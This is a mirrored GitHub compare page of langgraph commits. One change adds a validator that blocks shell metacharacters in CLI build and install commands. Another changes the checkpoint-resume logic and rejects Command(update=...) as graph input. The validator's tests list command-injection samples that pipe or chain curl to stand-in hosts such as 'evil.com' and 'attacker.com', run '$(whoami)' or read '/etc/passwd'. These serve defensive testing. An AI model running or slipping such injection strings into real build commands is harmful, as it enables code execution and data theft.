mirror of
https://github.com/langchain-ai/langgraph.git
synced 2026-10-11 10:45:18 +02:00
Compare commits
3
Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
9f8e2c83ac | ||
|
|
4826222d4d | ||
|
|
e00a027579 |
@@ -409,6 +409,18 @@ def build(
|
||||
install_command: str | None,
|
||||
build_command: str | None,
|
||||
):
|
||||
if install_command and langgraph_cli.config.has_disallowed_build_command_content(
|
||||
install_command
|
||||
):
|
||||
raise click.UsageError(
|
||||
"install_command contains disallowed characters or patterns."
|
||||
)
|
||||
if build_command and langgraph_cli.config.has_disallowed_build_command_content(
|
||||
build_command
|
||||
):
|
||||
raise click.UsageError(
|
||||
"build_command contains disallowed characters or patterns."
|
||||
)
|
||||
with Runner() as runner, Progress(message="Pulling...") as set:
|
||||
if shutil.which("docker") is None:
|
||||
raise click.UsageError("Docker not installed") from None
|
||||
|
||||
@@ -13,6 +13,36 @@ from langgraph_cli.schemas import Config, Distros
|
||||
MIN_NODE_VERSION = "20"
|
||||
DEFAULT_NODE_VERSION = "20"
|
||||
|
||||
DISALLOWED_BUILD_COMMAND_CHARS = [
|
||||
'"',
|
||||
"`",
|
||||
"\\",
|
||||
"\n",
|
||||
"\r",
|
||||
"\0",
|
||||
"\t",
|
||||
"|",
|
||||
";",
|
||||
"$",
|
||||
">",
|
||||
"<",
|
||||
]
|
||||
|
||||
# Regex pattern matching a single "&" that is NOT part of "&&".
|
||||
# This blocks background execution (cmd &) while allowing command
|
||||
# chaining (cmd1 && cmd2) which is common in build commands.
|
||||
_SINGLE_AMPERSAND_RE = re.compile(r"(?<!&)&(?:&&)*(?!&)")
|
||||
|
||||
|
||||
def has_disallowed_build_command_content(command: str) -> bool:
|
||||
"""Check if a command string contains disallowed characters or patterns."""
|
||||
if any(char in command for char in DISALLOWED_BUILD_COMMAND_CHARS):
|
||||
return True
|
||||
if _SINGLE_AMPERSAND_RE.search(command):
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
MIN_PYTHON_VERSION = "3.11"
|
||||
DEFAULT_PYTHON_VERSION = "3.11"
|
||||
|
||||
|
||||
@@ -14,6 +14,7 @@ from langgraph_cli.config import (
|
||||
config_to_compose,
|
||||
config_to_docker,
|
||||
docker_tag,
|
||||
has_disallowed_build_command_content,
|
||||
validate_config,
|
||||
validate_config_file,
|
||||
)
|
||||
@@ -1692,3 +1693,49 @@ def test_config_to_compose_with_api_version():
|
||||
|
||||
# Check that the compose file includes the correct FROM line with api_version
|
||||
assert "FROM langchain/langgraphjs-api:0.2.74-node20" in actual_compose_str
|
||||
|
||||
|
||||
class TestHasDisallowedBuildCommandContent:
|
||||
"""Tests for has_disallowed_build_command_content."""
|
||||
|
||||
@pytest.mark.parametrize(
|
||||
"char",
|
||||
['"', "`", "\\", "\n", "\r", "\0", "\t", "|", ";", "$", ">", "<"],
|
||||
)
|
||||
def test_disallowed_chars_rejected(self, char: str) -> None:
|
||||
assert has_disallowed_build_command_content(f"npm install{char}some-package")
|
||||
|
||||
@pytest.mark.parametrize(
|
||||
"cmd",
|
||||
[
|
||||
"pip install foo | curl attacker.com",
|
||||
"npm install; curl evil.com",
|
||||
"pip install $(whoami)",
|
||||
"pip install ${IFS}evil",
|
||||
"curl evil.com & disown",
|
||||
"npm install & curl evil.com",
|
||||
"pip install > /dev/null",
|
||||
"cat < /etc/passwd",
|
||||
],
|
||||
)
|
||||
def test_injection_patterns_rejected(self, cmd: str) -> None:
|
||||
assert has_disallowed_build_command_content(cmd)
|
||||
|
||||
def test_single_ampersand_rejected(self) -> None:
|
||||
assert has_disallowed_build_command_content("npm install & curl evil.com")
|
||||
|
||||
def test_double_ampersand_allowed(self) -> None:
|
||||
assert not has_disallowed_build_command_content("npm install && npm run build")
|
||||
|
||||
@pytest.mark.parametrize(
|
||||
"cmd",
|
||||
[
|
||||
"npm install",
|
||||
"pnpm install --frozen-lockfile",
|
||||
"next build && next export",
|
||||
"npm ci && npm run build",
|
||||
"pip install -e '.[dev]'",
|
||||
],
|
||||
)
|
||||
def test_valid_commands_allowed(self, cmd: str) -> None:
|
||||
assert not has_disallowed_build_command_content(cmd)
|
||||
|
||||
@@ -618,31 +618,33 @@ class PregelLoop:
|
||||
def _first(
|
||||
self, *, input_keys: str | Sequence[str], updated_channels: set[str] | None
|
||||
) -> set[str] | None:
|
||||
# Resuming from a previous checkpoint requires two things:
|
||||
# 1. A prior checkpoint exists (channel_versions is non-empty)
|
||||
# 2. The input signals continuation (not a fresh run with new input)
|
||||
# resuming from previous checkpoint requires
|
||||
# - finding a previous checkpoint
|
||||
# - receiving None input (outer graph) or RESUMING flag (subgraph)
|
||||
configurable = self.config.get(CONF, {})
|
||||
has_prior_checkpoint = bool(self.checkpoint["channel_versions"])
|
||||
# For subgraphs, the parent explicitly sets CONFIG_KEY_RESUMING.
|
||||
# For the outer graph, we infer from the input:
|
||||
# - None input: resume after interrupt (invoke(None, config))
|
||||
# - Command input: any Command operates on existing state
|
||||
# - Same run_id: re-entry into an ongoing run (e.g. stream reconnect)
|
||||
input_signals_resume = (
|
||||
self.input is None
|
||||
or isinstance(self.input, Command)
|
||||
or (
|
||||
not self.is_nested
|
||||
and self.config.get("metadata", {}).get("run_id")
|
||||
== self.checkpoint_metadata.get("run_id", MISSING)
|
||||
is_resuming = bool(self.checkpoint["channel_versions"]) and bool(
|
||||
configurable.get(
|
||||
CONFIG_KEY_RESUMING,
|
||||
self.input is None
|
||||
or isinstance(self.input, Command)
|
||||
or (
|
||||
not self.is_nested
|
||||
and self.config.get("metadata", {}).get("run_id")
|
||||
== self.checkpoint_metadata.get("run_id", MISSING)
|
||||
),
|
||||
)
|
||||
)
|
||||
is_resuming = has_prior_checkpoint and bool(
|
||||
configurable.get(CONFIG_KEY_RESUMING, input_signals_resume)
|
||||
)
|
||||
|
||||
# map command to writes
|
||||
if isinstance(self.input, Command):
|
||||
if self.input.update:
|
||||
raise ValueError(
|
||||
"Command(update=...) is not allowed as graph input. "
|
||||
"To modify state before resuming, use graph.update_state(...) "
|
||||
"to fork the graph state, then resume with Command(resume=...). "
|
||||
"Note: Command(update=...) can still be used as a return "
|
||||
"value from a node to update graph state during execution."
|
||||
)
|
||||
if (resume := self.input.resume) is not None:
|
||||
if not self.checkpointer:
|
||||
raise RuntimeError(
|
||||
@@ -729,18 +731,10 @@ class PregelLoop:
|
||||
self._put_checkpoint({"source": "input"})
|
||||
elif CONFIG_KEY_RESUMING not in configurable:
|
||||
raise EmptyInputError(f"Received no input for {input_keys}")
|
||||
# Propagate resuming flag to subgraphs (only the outer graph does this).
|
||||
# update config
|
||||
if not self.is_nested:
|
||||
has_resume_value = (
|
||||
isinstance(self.input, Command) and self.input.resume is not None
|
||||
)
|
||||
# When forking (skip_done_tasks=False, i.e. specific checkpoint_id),
|
||||
# subgraphs should NOT resume — they start fresh.
|
||||
# When genuinely resuming from latest, subgraphs should also resume.
|
||||
is_fork = not self.skip_done_tasks
|
||||
subgraph_should_resume = has_resume_value or (is_resuming and not is_fork)
|
||||
self.config = patch_configurable(
|
||||
self.config, {CONFIG_KEY_RESUMING: subgraph_should_resume}
|
||||
self.config, {CONFIG_KEY_RESUMING: is_resuming}
|
||||
)
|
||||
# set flag
|
||||
self.status = "pending"
|
||||
@@ -1123,19 +1117,6 @@ class SyncPregelLoop(PregelLoop, AbstractContextManager):
|
||||
if saved.pending_writes is not None
|
||||
else []
|
||||
)
|
||||
# When replaying from a specific checkpoint (fork), drop cached
|
||||
# RESUME writes so that interrupt() calls re-fire instead of
|
||||
# returning stale values. But if the input directly carries a
|
||||
# resume value, keep them — multi-interrupt scenarios need
|
||||
# previously resolved RESUME values preserved.
|
||||
is_replaying = not self.skip_done_tasks
|
||||
has_resume_value = (
|
||||
self.config.get(CONF, {}).get(CONFIG_KEY_RESUMING) is True
|
||||
) or (isinstance(self.input, Command) and self.input.resume is not None)
|
||||
if is_replaying and not has_resume_value:
|
||||
self.checkpoint_pending_writes = [
|
||||
w for w in self.checkpoint_pending_writes if w[1] != RESUME
|
||||
]
|
||||
|
||||
self.submit = self.stack.enter_context(BackgroundExecutor(self.config))
|
||||
self.channels, self.managed = channels_from_checkpoint(
|
||||
@@ -1315,19 +1296,6 @@ class AsyncPregelLoop(PregelLoop, AbstractAsyncContextManager):
|
||||
if saved.pending_writes is not None
|
||||
else []
|
||||
)
|
||||
# When replaying from a specific checkpoint (fork), drop cached
|
||||
# RESUME writes so that interrupt() calls re-fire instead of
|
||||
# returning stale values. But if the input directly carries a
|
||||
# resume value, keep them — multi-interrupt scenarios need
|
||||
# previously resolved RESUME values preserved.
|
||||
is_replaying = not self.skip_done_tasks
|
||||
has_resume_value = (
|
||||
self.config.get(CONF, {}).get(CONFIG_KEY_RESUMING) is True
|
||||
) or (isinstance(self.input, Command) and self.input.resume is not None)
|
||||
if is_replaying and not has_resume_value:
|
||||
self.checkpoint_pending_writes = [
|
||||
w for w in self.checkpoint_pending_writes if w[1] != RESUME
|
||||
]
|
||||
|
||||
self.submit = await self.stack.enter_async_context(
|
||||
AsyncBackgroundExecutor(self.config)
|
||||
|
||||
@@ -5850,6 +5850,31 @@ def test_task_before_interrupt_resume(
|
||||
assert result == {"answers": ["answer1", "answer2"]}
|
||||
|
||||
|
||||
def test_command_with_update_input_raises(
|
||||
sync_checkpointer: BaseCheckpointSaver,
|
||||
) -> None:
|
||||
"""Test that Command(update=...) raises ValueError when used as graph input."""
|
||||
|
||||
@entrypoint(checkpointer=sync_checkpointer)
|
||||
def workflow(inputs: str) -> str:
|
||||
answer = interrupt("question")
|
||||
return answer
|
||||
|
||||
config = {"configurable": {"thread_id": "1"}}
|
||||
|
||||
# First invocation triggers interrupt
|
||||
result = workflow.invoke("start", config=config)
|
||||
assert "__interrupt__" in result
|
||||
|
||||
# Command with update (and resume) should raise
|
||||
with pytest.raises(ValueError, match="Command\\(update="):
|
||||
workflow.invoke(Command(resume="answer", update={"foo": "bar"}), config=config)
|
||||
|
||||
# Command with update only (no resume) should also raise
|
||||
with pytest.raises(ValueError, match="Command\\(update="):
|
||||
workflow.invoke(Command(update={"foo": "bar"}), config=config)
|
||||
|
||||
|
||||
def test_multiple_tasks_before_interrupt_resume(
|
||||
sync_checkpointer: BaseCheckpointSaver,
|
||||
) -> None:
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
Reference in New Issue
Block a user